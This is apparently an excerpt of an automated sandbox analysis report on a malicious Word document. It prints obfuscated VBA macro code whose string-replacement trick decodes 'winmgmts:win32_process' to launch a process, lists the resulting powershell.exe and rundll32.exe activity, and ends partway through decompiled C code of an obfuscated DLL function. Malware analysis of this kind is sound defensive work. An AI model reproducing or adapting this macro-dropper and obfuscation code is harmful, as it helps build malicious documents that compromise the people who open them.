241	TpAnAB.Range.Text = FTbqcNF	Range
242	Set TpAnAB.Range.ParagraphStyle = Bcur5699z4d.Styles("Normal")	Range Styles
243	Endif
244	Set bEIjwUFFB = EBTVGH	EBTVGH
245	Next TpAnAB	Paragraphs
245	dUBsAD:
247	Goto ruwfBB
248	Dim BApwTCG as Paragraph
249	Set ubHTxDED = ilrmFI	ilrmFI
250	For Each BApwTCG in Bcur5699z4d.Paragraphs	Paragraphs
251	Set dueIMGo = zhliJ	zhliJ
252	If Left(BApwTCG.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then	Left Range Len
253	ruwfBB = BApwTCG.Range.ListFormat.ListString	Range
254	Elseif InStr(BApwTCG.Range.Text, "kkiew") > 1 Then	InStr Range
255	jVymJ = BApwTCG.Range.Text	Range
256	jVymJ = Replace(saw, "sjgwb", "hqkwjbjdasd" & ruwfBB)	Replace saw
257	BApwTCG.Range.Text = jVymJ	Range
258	Set BApwTCG.Range.ParagraphStyle = Bcur5699z4d.Styles("Normal")	Range Styles
259	Endif
260	Set XSZpp = DvhBN	DvhBN
261	Next BApwTCG	Paragraphs
261	ruwfBB:
263	Goto BlbPRi
264	Dim pbPXFg as Paragraph
265	Set lSOmIHg = wHzvQRHCw	wHzvQRHCw
266	For Each pbPXFg in Bcur5699z4d.Paragraphs	Paragraphs
267	Set vttGko = OtoVEFFI	OtoVEFFI
268	If Left(pbPXFg.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then	Left Range Len
269	BlbPRi = pbPXFg.Range.ListFormat.ListString	Range
270	Elseif InStr(pbPXFg.Range.Text, "kkiew") > 1 Then	InStr Range
271	SEEmDH = pbPXFg.Range.Text	Range
272	SEEmDH = Replace(saw, "sjgwb", "hqkwjbjdasd" & BlbPRi)	Replace saw
273	pbPXFg.Range.Text = SEEmDH	Range
274	Set pbPXFg.Range.ParagraphStyle = Bcur5699z4d.Styles("Normal")	Range Styles
275	Endif
276	Set IGyeHIDF = tfnHGB	tfnHGB
277	Next pbPXFg	Paragraphs
277	BlbPRi:
279	Hbs0geilvqul = Replace(Cxe014lg73v5, "sg yw ah", Zn5_1mdwh2kp2)	Replace("wsg yw ahinsg yw ahmsg yw ahgmsg yw ahtsg yw ahsg yw ahsg yw ahsg yw ahssg yw ahsg yw ahsg yw ah:wsg yw ahsg yw ahinsg yw ah3sg yw ah2sg yw ah_sg yw ahsg yw ahpsg yw ahsg yw ahrosg yw ahsg yw ahcesg yw ahssg yw ahssg yw ahsg yw ah","sg yw ah",) -> winmgmts:win32_process Zn5_1mdwh2kp2 executed
280	Goto YfXWF
281	Dim aiupjCA as Paragraph
282	Set HFzCp = aNLHyKGxD	aNLHyKGxD
283	For Each aiupjCA in Bcur5699z4d.Paragraphs	Paragraphs
284	Set NrnOEeCi = VrzOGkkDJ	VrzOGkkDJ
285	If Left(aiupjCA.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then	Left Range Len
286	YfXWF = aiupjCA.Range.ListFormat.ListString	Range
287	Elseif InStr(aiupjCA.Range.Text, "kkiew") > 1 Then	InStr Range
288	EiZIHkBmm = aiupjCA.Range.Text	Range
289	EiZIHkBmm = Replace(saw, "sjgwb", "hqkwjbjdasd" & YfXWF)	Replace saw
290	aiupjCA.Range.Text = EiZIHkBmm	Range
291	Set aiupjCA.Range.ParagraphStyle = Bcur5699z4d.Styles("Normal")	Range Styles
292	Endif
293	Set LCIxEHv = ykoqBxAG	ykoqBxAG
294	Next aiupjCA	Paragraphs
294	YfXWF:
296	Goto dwTYCJwLC
297	Dim aqFpElJ as Paragraph
298	Set aiaDHfVAA = BjqtUGzGV	BjqtUGzGV
299	For Each aqFpElJ in Bcur5699z4d.Paragraphs	Paragraphs
300	Set WHeXGpVAC = LEeUqk	LEeUqk
301	If Left(aqFpElJ.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then	Left Range Len
302	dwTYCJwLC = aqFpElJ.Range.ListFormat.ListString	Range
303	Elseif InStr(aqFpElJ.Range.Text, "kkiew") > 1 Then	InStr Range
304	wTHGJGJ = aqFpElJ.Range.Text	Range
305	wTHGJGJ = Replace(saw, "sjgwb", "hqkwjbjdasd" & dwTYCJwLC)	Replace saw
306	aqFpElJ.Range.Text = wTHGJGJ	Range
307	Set aqFpElJ.Range.ParagraphStyle = Bcur5699z4d.Styles("Normal")	Range Styles
308	Endif
309	Set KnxFzdf = wuVfVIU	wuVfVIU
310	Next aqFpElJ	Paragraphs
310	dwTYCJwLC:
312	Goto PIEpnIEQ
313	Dim DagVrchHi as Paragraph
314	Set QjbRmCII = ifZhJxP	ifZhJxP
315	For Each DagVrchHi in Bcur5699z4d.Paragraphs	Paragraphs
316	Set QurlJAjI = rQGxCbRtR	rQGxCbRtR
317	If Left(DagVrchHi.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then	Left Range Len
318	PIEpnIEQ = DagVrchHi.Range.ListFormat.ListString	Range
319	Elseif InStr(DagVrchHi.Range.Text, "kkiew") > 1 Then	InStr Range
320	xWqeABhHw = DagVrchHi.Range.Text	Range
321	xWqeABhHw = Replace(saw, "sjgwb", "hqkwjbjdasd" & PIEpnIEQ)	Replace saw
322	DagVrchHi.Range.Text = xWqeABhHw	Range
323	Set DagVrchHi.Range.ParagraphStyle = Bcur5699z4d.Styles("Normal")	Range Styles
324	Endif
325	Set wJKPQpiH = NirTjIE	NirTjIE
326	Next DagVrchHi	Paragraphs
326	PIEpnIEQ:
328	End Function

Function Yvxv3g2kutodnaylkq, APIs: 162, Strings: 60, Number of lines: 70, Relevance: 333.07

APIs	Meta Information
nWADOALQ
Paragraphs
EqstFcEf
Left
Range
Len
Range
InStr
Range
Range
Replace
saw
Range
Range
Styles
CITOv
swJREBktH
Paragraphs
MllKTIJEc
Left
Range
Len
Range
InStr
Range
Range
Replace
saw
Range
Range
Styles
fishDz
Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: ZBXzADzi
Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: Paragraphs
Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: ZAXDGY
Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: Left
Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: Range
Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: Len
Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: Range
Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: InStr
Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: Range
Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: Range
Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: Replace
Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: saw
Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: Range
Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: Range
Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: Styles
Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: EBTVGH
Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: ilrmFI
Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: Paragraphs
Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: zhliJ
Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: Left
Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: Range
Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: Len
Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: Range
Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: InStr
Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: Range
Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: Range
Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: Replace
Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: saw
Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: Range
Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: Range
Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: Styles
Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: DvhBN
Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: wHzvQRHCw
Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: Paragraphs
Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: OtoVEFFI
Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: Left
Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: Range
Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: Len
Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: Range
Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: InStr
Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: Range
Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: Range
Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: Replace
Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: saw
Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: Range
Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: Range
Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: Styles
Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: tfnHGB
Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: Replace
Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: Zn5_1mdwh2kp2
Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: aNLHyKGxD
Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: Paragraphs
Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: VrzOGkkDJ
Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: Left
Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: Range
Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: Len
Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: Range
Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: InStr
Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: Range
Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: Range
Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: Replace
Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: saw
Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: Range
Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: Range
Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: Styles
Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: ykoqBxAG
Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: BjqtUGzGV
Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: Paragraphs
Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: LEeUqk
Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: Left
Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: Range
Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: Len
Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: Range
Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: InStr
Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: Range
Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: Range
Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: Replace
Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: saw
Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: Range
Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: Range
Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: Styles
Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: wuVfVIU
Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: ifZhJxP
Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: Paragraphs
Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: rQGxCbRtR
Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: Left
Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: Range
Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: Len
Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: Range
Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: InStr
Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: Range
Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: Range
Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: Replace
Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: saw
Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: Range
Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: Range
Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: Styles
Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: NirTjIE
xvhwEkIi
Paragraphs
vYqwDI
Left
Range
Len
Range
InStr
Range
Range
Replace
saw
Range
Range
Styles
MFcvbrIeP
HmUuEIbVG
Paragraphs
gzBJqD
Left
Range
Len
Range
InStr
Range
Range
Replace
saw
Range
Range
Styles
polxC

Strings	Decrypted Strings
"Normal"
"hqkwjbjdasd"
"kkiew"
"sjgwb"
"xxx"
"xxxx"
"xxx"
"xxxx"
"Normal"
"hqkwjbjdasd"
"kkiew"
"sjgwb"
"hqkwjbjdasd"
"sjgwb"
"Normal"
"Normal"
"hqkwjbjdasd"
"kkiew"
"sjgwb"
"xxx"
"xxxx"
"xxx"
"xxxx"
"Normal"
"hqkwjbjdasd"
"kkiew"
"sjgwb"
"hqkwjbjdasd"
"sjgwb"
"Normal"
"Normal"
"hqkwjbjdasd"
"kkiew"
"sjgwb"
"xxx"
"xxxx"
"xxx"
"xxxx"
"Normal"
"hqkwjbjdasd"
"kkiew"
"sjgwb"
"hqkwjbjdasd"
"sjgwb"
"Normal"
"Normal"
"hqkwjbjdasd"
"kkiew"
"sjgwb"
"xxx"
"xxxx"
"xxx"
"xxxx"
"Normal"
"hqkwjbjdasd"
"kkiew"
"sjgwb"
"hqkwjbjdasd"
"sjgwb"
"Normal"

Line	Instruction	Meta Information
160	Function Yvxv3g2kutodnaylkq(T3bxybxcdn5d)
161	On Error Resume Next	executed
162	Goto zfIxDdGy
163	Dim KekJrc as Paragraph
164	Set mWRkEDBn = nWADOALQ	nWADOALQ
165	For Each KekJrc in Bcur5699z4d.Paragraphs	Paragraphs
166	Set jhoJOEJc = EqstFcEf	EqstFcEf
167	If Left(KekJrc.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then	Left Range Len
168	zfIxDdGy = KekJrc.Range.ListFormat.ListString	Range
169	Elseif InStr(KekJrc.Range.Text, "kkiew") > 1 Then	InStr Range
170	rvAquNI = KekJrc.Range.Text	Range
171	rvAquNI = Replace(saw, "sjgwb", "hqkwjbjdasd" & zfIxDdGy)	Replace saw
172	KekJrc.Range.Text = rvAquNI	Range
173	Set KekJrc.Range.ParagraphStyle = Bcur5699z4d.Styles("Normal")	Range Styles
174	Endif
175	Set QpteDQ = CITOv	CITOv
176	Next KekJrc	Paragraphs
176	zfIxDdGy:
178	Zonfu7wvfwo = T3bxybxcdn5d
179	Goto QrQLEAI
180	Dim aJzPBis as Paragraph
181	Set EGxLDh = swJREBktH	swJREBktH
182	For Each aJzPBis in Bcur5699z4d.Paragraphs	Paragraphs
183	Set uqBHEDw = MllKTIJEc	MllKTIJEc
184	If Left(aJzPBis.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then	Left Range Len
185	QrQLEAI = aJzPBis.Range.ListFormat.ListString	Range
186	Elseif InStr(aJzPBis.Range.Text, "kkiew") > 1 Then	InStr Range
187	golkzCJBD = aJzPBis.Range.Text	Range
188	golkzCJBD = Replace(saw, "sjgwb", "hqkwjbjdasd" & QrQLEAI)	Replace saw
189	aJzPBis.Range.Text = golkzCJBD	Range
190	Set aJzPBis.Range.ParagraphStyle = Bcur5699z4d.Styles("Normal")	Range Styles
191	Endif
192	Set qOgvIXcc = fishDz	fishDz
193	Next aJzPBis	Paragraphs
193	QrQLEAI:
195	Mgpwbt669dipg22hz = Hbs0geilvqul(Zonfu7wvfwo)
196	Goto VGSqAr
197	Dim kBCITgNAC as Paragraph
198	Set vXdLFECJ = xvhwEkIi	xvhwEkIi
199	For Each kBCITgNAC in Bcur5699z4d.Paragraphs	Paragraphs
200	Set SeBOI = vYqwDI	vYqwDI
201	If Left(kBCITgNAC.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then	Left Range Len
202	VGSqAr = kBCITgNAC.Range.ListFormat.ListString	Range
203	Elseif InStr(kBCITgNAC.Range.Text, "kkiew") > 1 Then	InStr Range
204	bxSXGCyrq = kBCITgNAC.Range.Text	Range
205	bxSXGCyrq = Replace(saw, "sjgwb", "hqkwjbjdasd" & VGSqAr)	Replace saw
206	kBCITgNAC.Range.Text = bxSXGCyrq	Range
207	Set kBCITgNAC.Range.ParagraphStyle = Bcur5699z4d.Styles("Normal")	Range Styles
208	Endif
209	Set LqcVa = MFcvbrIeP	MFcvbrIeP
210	Next kBCITgNAC	Paragraphs
210	VGSqAr:
212	Yvxv3g2kutodnaylkq = Mgpwbt669dipg22hz
213	Goto ODMoFC
214	Dim PEaiK as Paragraph
215	Set ihnSRH = HmUuEIbVG	HmUuEIbVG
216	For Each PEaiK in Bcur5699z4d.Paragraphs	Paragraphs
217	Set sDmVCG = gzBJqD	gzBJqD
218	If Left(PEaiK.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then	Left Range Len
219	ODMoFC = PEaiK.Range.ListFormat.ListString	Range
220	Elseif InStr(PEaiK.Range.Text, "kkiew") > 1 Then	InStr Range
221	NcnmJ = PEaiK.Range.Text	Range
222	NcnmJ = Replace(saw, "sjgwb", "hqkwjbjdasd" & ODMoFC)	Replace saw
223	PEaiK.Range.Text = NcnmJ	Range
224	Set PEaiK.Range.ParagraphStyle = Bcur5699z4d.Styles("Normal")	Range Styles
225	Endif
226	Set CzpmH = polxC	polxC
227	Next PEaiK	Paragraphs
227	ODMoFC:
229	End Function

Module: Xxuu21l7kiwbxwj_0

Declaration

Line	Content
1	Attribute VB_Name = "Xxuu21l7kiwbxwj_0"

Reset < >

Analysis Process: powershell.exe PID: 1100 Parent PID: 2424 powershell.exeCOMMON

Executed Functions

Function 000007FF002808C9, Relevance: .3, Instructions: 321COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2174636046.000007FF00280000.00000040.00000001.sdmp, Offset: 000007FF00280000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff00280000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9795190e9022d7641673b4d810470a562058e6952edffb92afe17bf5065339d5
Instruction ID: 1cbabc44e80b785a4390734cc759b819f9e30095a8fa360dd0b8cf5f3d46f92a
Opcode Fuzzy Hash: 9795190e9022d7641673b4d810470a562058e6952edffb92afe17bf5065339d5
Instruction Fuzzy Hash: 7A71572091EBC64FE74397785CA5AA17FF0AF17210B4A05E7D488CF0B3D9189D99C762

Uniqueness

Uniqueness Score: -1.00%

Function 000007FF00282F45, Relevance: .2, Instructions: 216COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2174636046.000007FF00280000.00000040.00000001.sdmp, Offset: 000007FF00280000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff00280000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ff9cbbd7be2385ec8b87817330c6a10eb01e84d6cfb7c598170194e4503bcad1
Instruction ID: 34fb67da95d8e47de1a59588a5d87fa6e3a5eb1594a2ba6aaeef72c8e4537a9a
Opcode Fuzzy Hash: ff9cbbd7be2385ec8b87817330c6a10eb01e84d6cfb7c598170194e4503bcad1
Instruction Fuzzy Hash: 8651382151EBC60FE7435B789865AA17FB0EF17210B5A01EBD4C8CF0A3D9589E59C3A2

Uniqueness

Uniqueness Score: -1.00%

Function 000007FF00282921, Relevance: .1, Instructions: 84COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2174636046.000007FF00280000.00000040.00000001.sdmp, Offset: 000007FF00280000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff00280000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d715d17cd0abbc0c239e3b8ee01e7065db25b9bfa9e5904ff1aba71df7ef17ea
Instruction ID: 5dbb6a31ffb7a3077a623347963e2acc79dd5d1edd77c481d6c6fb0e1b7ab69b
Opcode Fuzzy Hash: d715d17cd0abbc0c239e3b8ee01e7065db25b9bfa9e5904ff1aba71df7ef17ea
Instruction Fuzzy Hash: 0511CE6044E3D14FD30387788964A907FB0EF57205B0B02DBC4C9CF0B3E6681969C722

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: rundll32.exe PID: 2724 Parent PID: 2696 rundll32.exeCOMMON

Execution Graph

Execution Coverage:	5%
Dynamic/Decrypted Code Coverage:	25.3%
Signature Coverage:	23.1%
Total number of Nodes:	91
Total number of Limit Nodes:	4

Executed Functions

Function 10017D7D, Relevance: 17.9, Strings: 14, Instructions: 374
COMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 92%

			E10017D7D() {
				char _v520;
				char _v1040;
				char _v1560;
				signed int _v1564;
				signed int _v1568;
				signed int _v1572;
				signed int _v1576;
				signed int _v1580;
				signed int _v1584;
				signed int _v1588;
				signed int _v1592;
				signed int _v1596;
				signed int _v1600;
				signed int _v1604;
				signed int _v1608;
				signed int _v1612;
				signed int _v1616;
				signed int _v1620;
				signed int _v1624;
				signed int _v1628;
				signed int _v1632;
				signed int _v1636;
				signed int _v1640;
				signed int _v1644;
				signed int _v1648;
				signed int _v1652;
				signed int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				signed int _v1672;
				signed int _v1676;
				signed int _v1680;
				signed int _v1684;
				signed int _v1688;
				signed int _v1692;
				signed int _v1696;
				signed int _v1700;
				signed int _v1704;
				signed int _v1708;
				signed int _v1712;
				signed int _v1716;
				signed int _v1720;
				signed int _t406;
				signed short* _t408;
				signed int _t423;
				signed int _t425;
				signed int _t426;
				signed int _t427;
				signed int _t428;
				signed int _t429;
				signed int _t430;
				signed int _t431;
				signed int _t432;
				signed int _t433;
				signed int _t441;
				signed int* _t470;
				signed int* _t471;
				signed short* _t477;
				signed int* _t478;

				_t478 =  &_v1720;
				_v1632 = 0x717f;
				_v1632 = _v1632 + 0xffff0b69;
				_v1632 = _v1632 + 0xffff4bbd;
				_v1632 = _v1632 ^ 0xfffec88c;
				_v1624 = 0x5b3d;
				_t425 = 0x4e;
				_v1624 = _v1624 / _t425;
				_v1624 = _v1624 + 0x3b40;
				_t423 = 0;
				_v1624 = _v1624 ^ 0x00006b1e;
				_t471 = 0x22ae8e06;
				_v1704 = 0xcbd5;
				_v1704 = _v1704 >> 6;
				_t426 = 0x17;
				_v1704 = _v1704 / _t426;
				_v1704 = _v1704 + 0x2ad9;
				_v1704 = _v1704 ^ 0x00003123;
				_v1580 = 0xdbf5;
				_t427 = 0x5c;
				_v1580 = _v1580 * 0x1b;
				_v1580 = _v1580 ^ 0x00173f74;
				_v1648 = 0x65d6;
				_v1648 = _v1648 + 0x84b1;
				_v1648 = _v1648 * 0x12;
				_v1648 = _v1648 ^ 0x00101fbb;
				_v1696 = 0x93ca;
				_v1696 = _v1696 * 0x14;
				_v1696 = _v1696 / _t427;
				_v1696 = _v1696 + 0xffff60cf;
				_v1696 = _v1696 ^ 0xffffe2d0;
				_v1568 = 0x4939;
				_v1568 = _v1568 + 0xaf0f;
				_v1568 = _v1568 ^ 0x0000d95a;
				_v1620 = 0x1fb;
				_v1620 = _v1620 | 0x860de658;
				_v1620 = _v1620 + 0xffff792b;
				_v1620 = _v1620 ^ 0x860d467d;
				_v1628 = 0x991f;
				_v1628 = _v1628 << 0xb;
				_v1628 = _v1628 + 0x8561;
				_v1628 = _v1628 ^ 0x04c95d8c;
				_v1688 = 0xc5a8;
				_t428 = 0xf;
				_v1688 = _v1688 * 0x46;
				_v1688 = _v1688 / _t428;
				_t429 = 0x21;
				_v1688 = _v1688 * 0x33;
				_v1688 = _v1688 ^ 0x00b7e901;
				_v1636 = 0x9981;
				_v1636 = _v1636 / _t429;
				_v1636 = _v1636 >> 8;
				_v1636 = _v1636 ^ 0x00005b8d;
				_v1672 = 0x4c1b;
				_v1672 = _v1672 << 3;
				_v1672 = _v1672 | 0xb8c6078b;
				_v1672 = _v1672 + 0xfffffa1e;
				_v1672 = _v1672 ^ 0xb8c64f7e;
				_v1680 = 0x7507;
				_v1680 = _v1680 ^ 0xfc87d912;
				_t430 = 0x57;
				_v1680 = _v1680 / _t430;
				_v1680 = _v1680 | 0x52ab30fe;
				_v1680 = _v1680 ^ 0x52ef22cb;
				_v1572 = 0xd7cd;
				_v1572 = _v1572 >> 1;
				_v1572 = _v1572 ^ 0x00004425;
				_v1612 = 0x327c;
				_t431 = 0x4a;
				_v1612 = _v1612 / _t431;
				_v1612 = _v1612 << 9;
				_v1612 = _v1612 ^ 0x000105f8;
				_v1684 = 0xeedb;
				_v1684 = _v1684 | 0xb4487ed8;
				_v1684 = _v1684 + 0xffffe615;
				_v1684 = _v1684 * 0x61;
				_v1684 = _v1684 ^ 0x4f9e85a0;
				_v1708 = 0xa411;
				_v1708 = _v1708 >> 0xb;
				_v1708 = _v1708 >> 0xc;
				_v1708 = _v1708 << 9;
				_v1708 = _v1708 ^ 0x00001027;
				_v1652 = 0x5fa;
				_v1652 = _v1652 * 0x15;
				_v1652 = _v1652 | 0x0889c09d;
				_v1652 = _v1652 ^ 0x0889d75f;
				_v1676 = 0xabed;
				_v1676 = _v1676 << 2;
				_v1676 = _v1676 + 0xffffe0e5;
				_v1676 = _v1676 ^ 0x9631fc90;
				_v1676 = _v1676 ^ 0x963327ba;
				_v1716 = 0x2f0;
				_v1716 = _v1716 >> 0xe;
				_v1716 = _v1716 >> 0xf;
				_v1716 = _v1716 >> 2;
				_v1716 = _v1716 ^ 0x00005632;
				_v1668 = 0xb719;
				_v1668 = _v1668 >> 0xf;
				_v1668 = _v1668 | 0x7bbc307b;
				_v1668 = _v1668 ^ 0x1874fdff;
				_v1668 = _v1668 ^ 0x63c8a7db;
				_v1700 = 0xf68;
				_v1700 = _v1700 * 0x3d;
				_v1700 = _v1700 * 0x5e;
				_v1700 = _v1700 ^ 0xc3b802d4;
				_v1700 = _v1700 ^ 0xc2e14722;
				_v1604 = 0xf526;
				_v1604 = _v1604 | 0xfb865dd6;
				_v1604 = _v1604 << 0x10;
				_v1604 = _v1604 ^ 0xfdf60e11;
				_v1692 = 0xe7a5;
				_v1692 = _v1692 >> 9;
				_v1692 = _v1692 * 0x69;
				_v1692 = _v1692 + 0xffffa091;
				_v1692 = _v1692 ^ 0xffffa346;
				_v1644 = 0xfb3a;
				_v1644 = _v1644 << 0xf;
				_v1644 = _v1644 | 0x145f0355;
				_v1644 = _v1644 ^ 0x7ddf4d76;
				_v1640 = 0x8cc2;
				_v1640 = _v1640 | 0xffda9e59;
				_v1640 = _v1640 ^ 0xffdaa737;
				_v1608 = 0x435c;
				_v1608 = _v1608 ^ 0x551376dd;
				_v1608 = _v1608 << 7;
				_v1608 = _v1608 ^ 0x899af7ad;
				_v1588 = 0xd652;
				_t432 = 0x1c;
				_v1588 = _v1588 / _t432;
				_v1588 = _v1588 ^ 0x000058ee;
				_v1720 = 0xa7dc;
				_v1720 = _v1720 ^ 0x05a38014;
				_t433 = 0x5b;
				_v1720 = _v1720 / _t433;
				_v1720 = _v1720 + 0xfffffd60;
				_v1720 = _v1720 ^ 0x000fa20d;
				_v1576 = 0xb9c2;
				_v1576 = _v1576 * 0x73;
				_v1576 = _v1576 ^ 0x0053500f;
				_v1596 = 0x70f2;
				_v1596 = _v1596 ^ 0x2104d0ae;
				_v1596 = _v1596 ^ 0x2104d823;
				_v1616 = 0x5963;
				_v1616 = _v1616 << 9;
				_v1616 = _v1616 ^ 0x4dab58e4;
				_v1616 = _v1616 ^ 0x4d19c9be;
				_v1564 = 0xedf5;
				_v1564 = _v1564 + 0xa5f4;
				_v1564 = _v1564 ^ 0x0001b6b3;
				_v1660 = 0x832e;
				_v1660 = _v1660 + 0xffff50b4;
				_v1660 = _v1660 >> 5;
				_v1660 = _v1660 ^ 0x07ffee80;
				_v1712 = 0x8701;
				_v1712 = _v1712 ^ 0x095342ef;
				_v1712 = _v1712 ^ 0x499570f7;
				_v1712 = _v1712 << 6;
				_v1712 = _v1712 ^ 0x31ad5d39;
				_v1664 = 0x5186;
				_v1664 = _v1664 * 0x48;
				_v1664 = _v1664 + 0xffff7e0d;
				_v1664 = _v1664 + 0xfc6;
				_v1664 = _v1664 ^ 0x00162065;
				_v1600 = 0x4362;
				_v1600 = _v1600 + 0xffff7a4f;
				_v1600 = _v1600 ^ 0xffff8bd1;
				_t477 = _v1600;
				_v1584 = 0x3cb6;
				_v1584 = _v1584 << 2;
				_v1584 = _v1584 ^ 0x0000d772;
				_v1656 = 0x7847;
				_v1656 = _v1656 * 0x76;
				_v1656 = _v1656 >> 7;
				_v1656 = _v1656 ^ 0x00002d73;
				_v1592 = 0x219b;
				_v1592 = _v1592 + 0x5ed0;
				_v1592 = _v1592 ^ 0x0000e1f1;
				while(_t471 != 0x5dac24b) {
					if(_t471 == 0x94e3c78) {
						_t408 = _t477;
						__eflags =  *_t477 - _t423;
						while(__eflags != 0) {
							__eflags =  *_t408 - 0x2c;
							if( *_t408 == 0x2c) {
								_t470 =  &_v1560;
								while(1) {
									_t408 =  &(_t408[1]);
									_t441 =  *_t408 & 0x0000ffff;
									__eflags = _t441;
									if(_t441 == 0) {
										break;
									}
